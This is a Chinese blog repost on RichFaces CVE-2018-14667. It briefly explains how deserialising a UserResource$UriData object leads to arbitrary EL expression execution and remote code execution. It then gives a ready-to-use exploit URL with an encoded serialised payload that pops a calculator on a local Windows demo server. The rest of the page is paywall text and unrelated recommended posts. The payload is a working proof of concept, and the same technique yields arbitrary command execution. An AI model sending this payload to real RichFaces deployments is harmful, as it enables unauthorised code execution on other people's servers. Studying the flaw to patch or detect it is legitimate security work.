RichFaces CVE-2018-14667

最新推荐文章于 2024-07-13 22:18:24 发布
最新推荐文章于 2024-07-13 22:18:24 发布
阅读量888 收藏
点赞数
文章标签: 5g 运维 runtime
原文链接:http://blog.51cto.com/13770310/2320131
版权

RichFaces CVE-2018-14667

0x00 RichFaces 简述

RichFaces是一个基于LGPL协议开放源代码的JSF(JavaServer Faces)组件库,它能够使应用开发方便地集成AJAX。现在的RichFaces库是由Ajax4jsf和RichFaces两部分组成
0x01

0x01 漏洞成因

Java RichFaces框架中包含一个RCE漏洞,恶意***者构造包含org.ajax4jsf.resource.UserResource$UriData序列化对象的特定UserResource请求,RichFaces会先反序列化该UriData对象,然后使用EL表达式解析并获取resource的modified、expires等值导致了任意EL表达式执行,通过构造特殊的EL表达式可实现远程任意代码执行。
参考链接中有具体的分析

0x02 payload

弹出计算器(windows)
http://127.0.0.1:8080/richfaces-demo-3.3.0.GA-tomcat6/a4j/s/3_3_0.GAorg.ajax4jsf.resource.UserResource/n/s/-1487394660/DATA/eAHNlc9rE0EUx6fRan!4o9pirSLEVWwqMttKPdQaKFRRIbXQtFXbg0w2L8nE2R-dnU0Wa6U9ePEiWnrz5rU9eZcWEUHw4l-gBxERoQhexZnZNLFBPfQSc5rdfft9732-b19Wv6Fmn6OzLs9jUiThYNHPYQ6-G3AL8JQPfKJycXqK08tEEKR-nRe-xtDuFNpvcSACRl1HgCMEOpwqkhIxGXHy5nimCJYYTqG9EHpUas6hB6gphVpsN0tzFLKV6-YSYQHoi9CTtZxREiHOEQt8bLm25zpSG6eFTHTNZVngaVICfvvti-Tys3djMRRLoVaLEd-!QWzYXkNacOrkZQ1tvnwnqzUEOhJVSV0zDZwSRu-RDIPh0FPpe2VK7AeOLoCB8DEwPEnyYyAKbvZK6MlOfOo6mgNCTfsQCjnqiYqWofVxc6nu9pnHHzdjOq6zGldTev7wUfr7zPtLKkJVMKTM4NQqRAgCionnMWoRIdNGHOqT3OQyBDhOrCxdXJ34pJl0ZYgPkQm1XAId082HJjBzWoGvPZOY9niEayOP16Lqcw2HyqsWWWhcFVrMuL5mVKd23fbY0NpC261l0RsxOlrtvS603LY4-2H95xMFQGm3lldQeGqew1wAvsB5EKPK3kRf9ZhyiZwDeYPJQ!TQUOpYTR6eCBxBbTB0fFR-wpAqtfvUKbl3IeEEjPVhCMFKGBZhVtzoW!iHlZ4Xyq5Pbuu6no5qO7PZ!aN949CYaluzKt9vYD8o4KhzVvsZ4al8FGvvpz9!OTF!VY-dnOaYQF2aIXXxeCC8QMhAILZAHTW00TxJEOU36LVZHVLThiwl0VsmhERCAN8sepBP6zMOC8Jm8ZH-c!3xkYGB8wODSWPb6kg2ym4j1Htpl948f!n068b19y9f2duhFQ6Wn6LFRnURh2jFogPaqkBQhuWyBmXUK7SxM6MKcmXeyQVO0qio!wcmKd49Fd7LaKlhvLf-w!4EfB293BnwYuCLpLEl3UDaArUo8yfl9v0Fa!nW8w__.jsf

最低0.47元/天 解锁文章
weixin_33694172
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MFC 程序打包换皮肤!
多多积累
05-28 1352
1.首先  这是皮肤代码 !addplugindir . !include "MUI2.nsh" Name "ISSkin" OutFile "ISSkin.exe" InstallDir "$LOCALAPPDATA\ISSkin" RequestExecutionLevel user !define MUI_ABORTWARNING !define MUI_CU
RichFaces RCE(CVE-2018-14667)
公众号shadow sock7
05-13 648
参考:https://xz.aliyun.com/t/3264 https://landgrey.me/richfaces-cve-2018-14667/
Richfaces复选框树(Checkbox tree)的纯java解决方案
topideal
02-18 190
最近需要做树形选择,google了好久找到<<Richfaces复选框树(Checkbox tree)的权限分配的解决方案 >>一文,但觉得和自己的要求不太符合,它的缺点在于选择时用jquery来决定子项的状态,但不能决定父项的状态,因此自己在此思路上扩展了一些功能,在此记录一下. 效果图:   xhtml文件: <a4j:region renderReg...
richface1-3
ccwjyq的博客
08-23 352
RichFaces开发指南3.3.3   1  介绍   RichFaces是一个开源框架,它不借助于JavaScript而增加Ajax能力到存在的JSF应用程序中。   RichFaces利用了JavaServer Faces框架,包括生命周期,验证,转换工具,以及静态和动态的资源管理。具用内建Ajax 支持和高度可定制观感的RichFaces组件能够容易地被纳入到JSF应用程序中。
Maven JSF Richfaces Example-开源
04-19
使用Maven 2,JSF,Richfaces,Tomahawk,JPA(Hibernate),Spring等的示例项目...
richfaces-ui-3.3.1.GA-bin
11-14
本文将详细探讨"richfaces-ui-3.3.1.GA-bin"这个压缩包中的核心知识点,带你领略RichFaces 3.3.1 GA版本的魅力。 一、RichFaces概述 RichFaces是一个开源项目,由Jboss公司(现Red Hat)维护,它扩展了JSF规范,...
RichFaces文档-中文
11-10
RichFaces文档-中文】是针对富客户端开发的开源框架,专为增强JavaServer Faces (JSF) 应用程序的Ajax能力而设计。RichFaces不仅整合了JSF的生命周期、验证、转换等功能,还提供了内建的Ajax支持,允许开发者无需...
richfaces-demo-3.1.6.GA-tomcat6
01-14
richfaces-demo-3.1.6.GA-tomcat6richfaces-demo-3.1.6.GA-tomcat6richfaces-demo-3.1.6.GA-tomcat6richfaces-demo-3.1.6.GA-tomcat6richfaces-demo-3.1.6.GA-tomcat6richfaces-demo-3.1.6.GA-tomcat6richfaces-demo...
richface的完整demo,对于在学习和正在使用该开源东东的兄弟姐妹们又很到的帮助,值得一用 ... MyEclipse6.0+SQL2000开发简单的通讯录系统 · javascript教程+例子 ...
04-09
richface的完整demo,对于在学习和正在使用该开源东东的兄弟姐妹们又很到的帮助,值得一用 ... MyEclipse6.0+SQL2000开发简单的通讯录系统 · javascript教程+例子 ...
richfaces-showcase.war
09-17
richfaces-distribution-4.5.8.Final的richfaces-showcase的部署包
命令注入_每日一问:记一次命令注入RCE
weixin_31785421的博客
12-24 164
在qq群里提出了一个每日一问的活动,目的是拓展渗透实战思路,问题不限于渗透、审计、红队、逆向。这篇文章是昨天晚上临时由实战环境改的一个CTF题。题目模拟真实环境在群里出了一道CTF题当作每日一问,代码形如:phpheader('Content-Type: text/html; charset=utf-8');//error_reporting(0);$upload_dir = 'uplo...
的表达式_EL表达式注入
weixin_28804631的博客
01-13 383
学习了下 做个记录什么是el表达式Expression Language表达式语言是一种在JSP页面获取数据的简单方式(只能获取数据,不能设置数据)在JSP2.0开始引入概念el表达式就是用来获取数据的,可从以下几个域获取属性pagescoperequestscope sessionscope applicationscope pagecontext以上对象范围从小到大,其中pagec...
jsf教程ajax,ajax4jsf解决办法
weixin_36330387的博客
08-06 289
当前位置:我的异常网» Java Web开发»ajax4jsf解决办法ajax4jsf解决办法www.myexceptions.net网友分享于:2013-02-21浏览:19次ajax4jsf我在做一个网站,用的是MyFaces,还用到了Ajax4JSF。但是原来用JSP实现的文件下载功能就不好使了,出现下面的异常,请问是怎么回事呀?怎么改正呢?java.lang.IllegalSt...
Richfaces速度优化及ACTIVEX控件和Firefox插件开发
11-02 2841
<br />不知是什么原因Richfaces控件在IE下速度特别的慢.在IE8下时有部分控件甚至会出现问题只能用兼容模式下使用.在网上找找了发现很多人有这问题.不知道Richfaces4.0会不会好一点,但richfaces4.0只能在JSF2.0上运行所以我也没办法试.就在网上找了点优化的方法,<br />如下:<br />http://feidaodalian.javaeye.com/blog/435779<br /> <br />虽然有点效果但是还是很慢,特别是那个datatable在数据多不分页时特
richfaces4 入门使用(一)
08-26 306
现在项目中使用了richfaces4刚开始使用时遇到了相当多的我难题,因为richfaces4问题很多,和richfaces3.3也有很多改变,有些改变甚至我觉得是莫名其妙的。如原来是modalPanel现在改名为popupPanle。。不解。   首先,请不要使用官网最新的jar,使用richfaces4 M5 的jar.因为我试了很多次,官网的好像有问题。 其次,richfaces4只能...
【学习笔记】无人机(UAV)在3GPP系统中的增强支持(二)-支持高分辨率视频直播应用
最新发布
u011376987的博客
07-13 945
除了5G系统提供的连接能力外,服务于VR直播的无人机的飞行状态应始终受到监控,以防出现任何异常。在无人机工作期间,其状态(如飞行轨迹、位置、飞行速度、飞行环境等)可以通过5G系统被监控,并报告给“Enjoy”公司的管理平台。[P.R.5.1-001] 3GPP系统应能够为无人机提供无缝连接服务,以支持高分辨率视频直播应用的发展。但随着向更高分辨率视频(例如8K)的发展,这些与5G系统相关的性能指标应进行更新。注:在此类用例中,无人机的飞行速度通常是静止或缓慢的,因此无人机的速度不会成为性能要求的考虑因素。
richfaces-api-3.3.1.ga-sources.jar
09-01
richfaces-api-3.3.1.ga-sources.jar是一个Java源代码的库文件,用于支持RichFaces框架的开发。 RichFaces是一个基于JavaServer Faces(JSF)的开源组件库,用于构建富互联网应用程序(RIA)。它提供了众多的用户界面组件和特性,能够加快开发速度,并提供丰富的用户体验。 richfaces-api-3.3.1.ga-sources.jar是RichFaces框架的API源代码的库文件。它包含了RichFaces框架的全部API的源代码,开发人员可以通过查看源代码来了解API的实现细节和内部工作原理。这对于理解框架的使用方法、进行二次开发或调试非常有帮助。 使用richfaces-api-3.3.1.ga-sources.jar,开发人员可以快速了解RichFaces的核心概念、类和方法。通过源代码的阅读,可以更好地理解如何使用RichFaces的组件和特性,以及如何根据自己的需求进行定制和扩展。 此外,richfaces-api-3.3.1.ga-sources.jar还可以用于调试RichFaces应用程序。通过查看源代码,开发人员可以追踪框架的执行流程,排查和修复可能的问题和错误。这对于提高应用程序的稳定性和性能至关重要。 总之,richfaces-api-3.3.1.ga-sources.jar是RichFaces框架中API的源代码库文件,它提供了开发人员了解和使用RichFaces的核心功能的途径,并支持开发过程中的调试和问题排查。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值